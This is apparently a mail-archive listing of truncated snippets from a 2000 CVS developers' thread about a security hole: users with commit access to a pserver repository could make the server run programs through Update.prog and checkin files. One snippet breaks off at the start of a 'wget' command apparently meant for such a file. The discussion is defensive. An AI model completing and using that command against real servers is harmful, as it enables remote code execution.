In article [EMAIL PROTECTED],
Michael Richardson [EMAIL PROTECTED] writes:
Systems that give shells out to people that have write access
are already open to running programs by clients.
So, this really affects people that use :pserver: with write
access.
The problem also affects
In article [EMAIL PROTECTED],
[EMAIL PROTECTED] (Larry Jones) writes:
It's a known problem. Like it says in the Cederqvist manual (under
"Security considerations with password authentication"):
... once a user has non-read-only access to the repository, she
can execute
In article [EMAIL PROTECTED],
[EMAIL PROTECTED] (Larry Jones) writes:
Update.prog just contains the name of the program to run, not the actual
code. If you can't commit, you can't upload arbitrary code to run, you
can only run pre-existing code on the server, and you have no control
over
"Ian" == Ian Lance Taylor [EMAIL PROTECTED] writes:
Ian This looks like a serious security problem. It appears to open
Ian anonymous CVS servers to a wide range of attack.
Correct me if I'm wrong, but it seems that one has to have commit
permissions to create these files, so in
"Karl" == Karl Fogel [EMAIL PROTECTED] writes:
Karl Sorry -- good point. I'll look at it in detail when I'm looking at it
Karl in detail, which will be early next week. In the meantime, I'll keep
Karl my mouth shut. :-)
Karl -K
Karl Ian Lance Taylor [EMAIL PROTECTED]
Ian Lance Taylor [EMAIL PROTECTED] writes:
This looks like a serious security problem. It appears to open
anonymous CVS servers to a wide range of attack.
It looks serious, but not for anonymous-only servers, since anonymous
users can't commit.
The hole here, I think, is that someone who
Ian Lance Taylor writes:
This looks like a serious security problem. It appears to open
anonymous CVS servers to a wide range of attack.
It's a known problem. Like it says in the Cederqvist manual (under
"Security considerations with password authentication"):
... once a user has
From: Karl Fogel [EMAIL PROTECTED]
Date: 28 Jul 2000 14:01:23 -0500
Ian Lance Taylor [EMAIL PROTECTED] writes:
This looks like a serious security problem. It appears to open
anonymous CVS servers to a wide range of attack.
It looks serious, but not for anonymous-only
Sorry -- good point. I'll look at it in detail when I'm looking at it
in detail, which will be early next week. In the meantime, I'll keep
my mouth shut. :-)
-K
Ian Lance Taylor [EMAIL PROTECTED] writes:
From: Karl Fogel [EMAIL PROTECTED]
Date: 28 Jul 2000 14:01:23 -0500
Ian
Hello!
On 28 Jul 2000, Karl Fogel wrote:
Sorry -- good point. I'll look at it in detail when I'm looking at it
in detail, which will be early next week. In the meantime, I'll keep
my mouth shut. :-)
I hope that there is no immediate danger. Look at serve_update_prog() - it
checks whether
Date: Fri, 28 Jul 2000 17:45:13 -0400 (EDT)
From: [EMAIL PROTECTED] (Larry Jones)
Ian Lance Taylor writes:
What if I frob Update.prog? I don't claim to understand all the cases
here, but it appears that that will be run by `cvs update'.
Update.prog just contains the name
Date: Fri, 28 Jul 2000 17:36:53 -0400 (EDT)
From: Pavel Roskin [EMAIL PROTECTED]
I hope that there is no immediate danger. Look at serve_update_prog() - it
checks whether commits are allowed and exits if they are not. It prints a
strange message though:
E Flag -u in modules
Date: 28 Jul 2000 14:58:08 -0700
From: Ian Lance Taylor [EMAIL PROTECTED]
Date: Fri, 28 Jul 2000 17:36:53 -0400 (EDT)
From: Pavel Roskin [EMAIL PROTECTED]
I hope that there is no immediate danger. Look at serve_update_prog() - it
checks whether commits are allowed
Update.prog just contains the name of the program to run, not the actual
code. If you can't commit, you can't upload arbitrary code to run, you
can only run pre-existing code on the server, and you have no control
over its input or arguments, so it's a very low-level threat.
cat "wget
On Fri, Jul 28, 2000 at 05:20:13PM -0400, Larry Jones wrote:
-- the simplest fix would
be to just get rid of checkin and update programs, but I'm not sure how
people would feel about that.
It would probably remove any chance I have of getting the
15 matches
Mail list logo